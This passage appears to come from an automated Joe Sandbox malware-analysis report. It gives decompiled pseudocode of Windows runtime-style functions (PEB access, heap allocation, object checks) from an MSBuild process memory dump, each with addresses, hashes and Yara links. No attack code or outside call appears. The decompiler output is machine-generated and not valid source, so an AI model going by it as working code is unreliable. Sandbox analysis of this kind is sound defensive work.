				_push( *_t15 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                                                0x01161608
                                                                                                0x01161617
                                                                                                0x0116161d
                                                                                                0x01161625
                                                                                                0x01161628
                                                                                                0x0116162b
                                                                                                0x01161636
                                                                                                0x01161648
                                                                                                0x01161638
                                                                                                0x01161641
                                                                                                0x01161641
                                                                                                0x01161653
                                                                                                0x01161654
                                                                                                0x01161656
                                                                                                0x0116165b
                                                                                                0x0116166e

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: edc71ec5ea262686339a6073e1d6799b20f3c3f83fd863424dbe208039f5fe7d
                                                                                                • Instruction ID: 34958817c54bb284a760606644201f9f48141cbb40b06e148a13e54d02595105
                                                                                                • Opcode Fuzzy Hash: edc71ec5ea262686339a6073e1d6799b20f3c3f83fd863424dbe208039f5fe7d
                                                                                                • Instruction Fuzzy Hash: 15F0C2B1A01208EFCB04EFA9D405AAEB7F8EF18300F044069A911EB380E6349900CB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010CC577 Relevance: .0, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010CC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E010CC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x10811cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E011788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                                0x010cc577
                                                                                                0x010cc57d
                                                                                                0x010cc581
                                                                                                0x010cc5b5
                                                                                                0x010cc5b9
                                                                                                0x010cc5ce
                                                                                                0x010cc5ce
                                                                                                0x010cc5ca
                                                                                                0x00000000
                                                                                                0x010cc5ca
                                                                                                0x010cc5c4
                                                                                                0x010cc5c8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010cc5ad
                                                                                                0x00000000
                                                                                                0x010cc5af

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ebe923dcf458736a9e9e62a47386e3d0320f1fb4fade190ff4019c8ef3ce1ebb
                                                                                                • Instruction ID: cac60db73ab7beb5f704fa6dec9f531d344fd2ebac811d23bb03bf278fc0b108
                                                                                                • Opcode Fuzzy Hash: ebe923dcf458736a9e9e62a47386e3d0320f1fb4fade190ff4019c8ef3ce1ebb
                                                                                                • Instruction Fuzzy Hash: 24F090B29157909FF776971CC214B297FE49B29E70F5444AED5CE87206C6A4DCC0CA50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01162073 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E01162073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0115FD22(__ecx);
				_t19 =  *0x119849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1198748; // 0x0
					if(__eflags <= 0) {
						E01161C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1198724 & 0x00000004;
							if(( *0x1198724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1198724; // 0x0
					return E01158DF1(__ebx, 0xc0000374, 0x1195890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                                0x01162076
                                                                                                0x01162078
                                                                                                0x0116207d
                                                                                                0x01162083
                                                                                                0x011620a4
                                                                                                0x011620aa
                                                                                                0x011620ac
                                                                                                0x011620b7
                                                                                                0x011620ba
                                                                                                0x011620bc
                                                                                                0x011620c9
                                                                                                0x011620c9
                                                                                                0x011620d0
                                                                                                0x011620d2
                                                                                                0x00000000
                                                                                                0x011620d2
                                                                                                0x011620be
                                                                                                0x011620c3
                                                                                                0x011620c5
                                                                                                0x011620c7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011620c7
                                                                                                0x011620bc
                                                                                                0x011620d4
                                                                                                0x01162085
                                                                                                0x01162085
                                                                                                0x011620a3
                                                                                                0x011620a3

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5806a111c1accae77a9f94cfb83e3cbc1edcf02474c6d170efbd1a02b16aaaa4
                                                                                                • Instruction ID: 292639c4f87a69ab5d8d544d931e317bdc1f4f9cffd18a3d64b9e082733efd5c
                                                                                                • Opcode Fuzzy Hash: 5806a111c1accae77a9f94cfb83e3cbc1edcf02474c6d170efbd1a02b16aaaa4
                                                                                                • Instruction Fuzzy Hash: EAF0A73B4155894ADF7F6B2D61113D93B9AD75A154B090455D87017209C73688E3CB10
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E927A Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 54%
                                                                                                			E010E927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E010EFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E010E92C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                                0x010e9295
                                                                                                0x010e9299
                                                                                                0x010e929f
                                                                                                0x010e92aa
                                                                                                0x010e92ad
                                                                                                0x010e92ae
                                                                                                0x010e92af
                                                                                                0x010e92b0
                                                                                                0x010e92b4
                                                                                                0x010e92bb
                                                                                                0x010e92bb
                                                                                                0x010e92c5

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                • Instruction ID: 4c9339904c6a6dc971ad4e8fcc57cce72383589951bf2eedb7a97377cd9d4be5
                                                                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                • Instruction Fuzzy Hash: 4DE0E5722405016BEB219E0ACC84B4776A9AF92724F04407CB5005E242C6E5D80887A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01178D34 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 43%
                                                                                                			E01178D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x119d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E010C7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                0x01178d34
                                                                                                0x01178d43
                                                                                                0x01178d4b
                                                                                                0x01178d4e
                                                                                                0x01178d52
                                                                                                0x01178d5c
                                                                                                0x01178d6e
                                                                                                0x01178d5e
                                                                                                0x01178d67
                                                                                                0x01178d67
                                                                                                0x01178d79
                                                                                                0x01178d7a
                                                                                                0x01178d7c
                                                                                                0x01178d81
                                                                                                0x01178d94

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 324c041ca1807ccf02b24e3dd5b6128de56b5d4de0efaed2388337dff705db78
                                                                                                • Instruction ID: 8c5392fd2c866b74c0a428ce335b7279240f9ef551925af0681cb794d1b2e2ec
                                                                                                • Opcode Fuzzy Hash: 324c041ca1807ccf02b24e3dd5b6128de56b5d4de0efaed2388337dff705db78
                                                                                                • Instruction Fuzzy Hash: FEF0B470A04609AFDB18EFB9D545AAE77B4EF18700F508099E915EB380DA34D900CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01178B58 Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 36%
                                                                                                			E01178B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x119d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E010C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                0x01178b67
                                                                                                0x01178b6f
                                                                                                0x01178b72
                                                                                                0x01178b7d
                                                                                                0x01178b8f
                                                                                                0x01178b7f
                                                                                                0x01178b88
                                                                                                0x01178b88
                                                                                                0x01178b9a
                                                                                                0x01178b9b
                                                                                                0x01178b9d
                                                                                                0x01178ba2
                                                                                                0x01178bb5

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 278a3bc6088ce8308b903bea0903b7279cbcd2e35be0794362b7b74cb74b24e4
                                                                                                • Instruction ID: bcbbc392ad01fcb4abf6e14d4affbbb3c647336004e9acd51a1bbf1cb7f48723
                                                                                                • Opcode Fuzzy Hash: 278a3bc6088ce8308b903bea0903b7279cbcd2e35be0794362b7b74cb74b24e4
                                                                                                • Instruction Fuzzy Hash: DCF082B0A14259AFDF14EBA9D90AEBE77B4EF14700F440459BA15DB380EB34D900CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010C746D Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 88%
                                                                                                			E010C746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E010BEB70(__ecx, 0x11979a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E010E95D0();
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                                0x010c746d
                                                                                                0x010c746d
                                                                                                0x010c746d
                                                                                                0x010c7471
                                                                                                0x010c7488
                                                                                                0x0110f92d
                                                                                                0x010c748e
                                                                                                0x010c7491
                                                                                                0x010c7495
                                                                                                0x0110f937
                                                                                                0x0110f93a
                                                                                                0x0110f94e
                                                                                                0x0110f953
                                                                                                0x0110f956
                                                                                                0x0110f956
                                                                                                0x010c7495
                                                                                                0x00000000
                                                                                                0x010c7488
                                                                                                0x010c7473
                                                                                                0x010c7478
                                                                                                0x010c747d
                                                                                                0x010c7481
                                                                                                0x00000000
                                                                                                0x010c7481
                                                                                                0x010c747d
                                                                                                0x010c747a
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a74c34ad03d4ac05597623b32b56f5aef60f8bc6beeaaa97a302918692d60b70
                                                                                                • Instruction ID: d6259b5b12b2e7692a29e8c4c4e09f927da47bcd4d3b25038a131024bd8c06fc
                                                                                                • Opcode Fuzzy Hash: a74c34ad03d4ac05597623b32b56f5aef60f8bc6beeaaa97a302918692d60b70
                                                                                                • Instruction Fuzzy Hash: 3DF0B434900145AADF5A976CC440BBEFFA2BF04A10F04025DD4D1A7191EB649801CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01178CD6 Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 36%
                                                                                                			E01178CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x119d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E010C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                0x01178ce5
                                                                                                0x01178ced
                                                                                                0x01178cf0
                                                                                                0x01178cfb
                                                                                                0x01178d0d
                                                                                                0x01178cfd
                                                                                                0x01178d06
                                                                                                0x01178d06
                                                                                                0x01178d18
                                                                                                0x01178d19
                                                                                                0x01178d1b
                                                                                                0x01178d20
                                                                                                0x01178d33

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 57b31cb8c8d99394b9121b427b143c43f556d977946eae39b04de1d150a88247
                                                                                                • Instruction ID: a58004edf7915efd6bab697e3dc6c5cbd95351f4597f8f48fa4b6de466e951b4
                                                                                                • Opcode Fuzzy Hash: 57b31cb8c8d99394b9121b427b143c43f556d977946eae39b04de1d150a88247
                                                                                                • Instruction Fuzzy Hash: 41F08970904109AFDF04DBA9D549DAE77B4EF18200F540159E555EB380EA34D900CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010A4F2E Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010A4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E011788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E010CC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1081030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                                0x010a4f2e
                                                                                                0x010a4f34
                                                                                                0x010a4f38
                                                                                                0x01100b85
                                                                                                0x01100b85
                                                                                                0x01100b89
                                                                                                0x01100b9a
                                                                                                0x01100b9a
                                                                                                0x01100b9f
                                                                                                0x00000000
                                                                                                0x01100b9f
                                                                                                0x01100b94
                                                                                                0x01100b98
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01100b98
                                                                                                0x010a4f3e
                                                                                                0x010a4f48
                                                                                                0x00000000
                                                                                                0x010a4f6e
                                                                                                0x00000000
                                                                                                0x010a4f70

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 84b89401cbfed1971e7781ffd393dde741f1b11d7918df7a3fcc06b60b71b87c
                                                                                                • Instruction ID: e39168f53eba5f4581aee95aa18707ac32ba341f823c68814ef14c459e0b600c
                                                                                                • Opcode Fuzzy Hash: 84b89401cbfed1971e7781ffd393dde741f1b11d7918df7a3fcc06b60b71b87c
                                                                                                • Instruction Fuzzy Hash: 16F0BE3A925E848FE777DB5CC244B22B7E8AB086B8F445464E44587AA2C7A4E980C740
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010DA44B Relevance: .0, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010DA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1197b9c; // 0x0
				_t15 = __ecx;
				_t16 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E010EFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                                0x010da44b
                                                                                                0x010da453
                                                                                                0x010da472
                                                                                                0x010da476
                                                                                                0x00000000
                                                                                                0x010da493
                                                                                                0x010da47a
                                                                                                0x010da47f
                                                                                                0x010da486
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 23630725927e79f2be13859b97f114f906dd2fb03e534e5942b91ea2bba0a39b
                                                                                                • Instruction ID: 333704ec0072eb55d588304e13e339203d0b9c5396619edc9a7b7339c6a69ea0
                                                                                                • Opcode Fuzzy Hash: 23630725927e79f2be13859b97f114f906dd2fb03e534e5942b91ea2bba0a39b
                                                                                                • Instruction Fuzzy Hash: F8E09272B01422EBD2215B18EC00FAB73ADEBE4A51F0A4039E685C7254DA68DD01CBE0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010AF358 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 79%
                                                                                                			E010AF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E010DF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L010C4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                                0x010af35d
                                                                                                0x010af361
                                                                                                0x010af367
                                                                                                0x010af372
                                                                                                0x010af38c
                                                                                                0x010af38c
                                                                                                0x010af394

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                • Instruction ID: 27724b876590b38ed41d62c90d182c434489cad07036992a2119cff73c5ad5fa
                                                                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                • Instruction Fuzzy Hash: D8E0D833A40219FBDB3196D99D05F9EBFBCDB58AA0F018195BA44D7150D5619D00C6D0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010BFF60 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010BFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x10811a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E011788F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E010C0050(_t14);
				}
			}










                                                                                                0x010bff66
                                                                                                0x010bff6b
                                                                                                0x00000000
                                                                                                0x010bff8f
                                                                                                0x00000000
                                                                                                0x010bff8f

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 94719e63d12c2a7e8645b75d1fbdf6d768ffc4cd52dd22172b23cc92a2a2e88f
                                                                                                • Instruction ID: 1561ff7a3284ceaec60361d9a39846443c9aff05c57cee7c25bd750da594d49f
                                                                                                • Opcode Fuzzy Hash: 94719e63d12c2a7e8645b75d1fbdf6d768ffc4cd52dd22172b23cc92a2a2e88f
                                                                                                • Instruction Fuzzy Hash: 3DE0DFB0609207DFDB39DB59D8C0FA93BE8DF52721F1AC09DF0884B102C661D881C68A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 011341E8 Relevance: .0, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E011341E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x11808f0);
				_t5 = E010FD08C(__ebx, __edi, __esi);
				if( *0x11987ec == 0) {
					E010BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x11987ec == 0) {
						 *0x11987f0 = 0x11987ec;
						 *0x11987ec = 0x11987ec;
						 *0x11987e8 = 0x11987e4;
						 *0x11987e4 = 0x11987e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01134248();
				}
				return E010FD0D1(_t5);
			}





                                                                                                0x011341e8
                                                                                                0x011341ea
                                                                                                0x011341ef
                                                                                                0x011341fb
                                                                                                0x01134206
                                                                                                0x0113420b
                                                                                                0x01134216
                                                                                                0x0113421d
                                                                                                0x01134222
                                                                                                0x0113422c
                                                                                                0x01134231
                                                                                                0x01134231
                                                                                                0x01134236
                                                                                                0x0113423d
                                                                                                0x0113423d
                                                                                                0x01134247

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
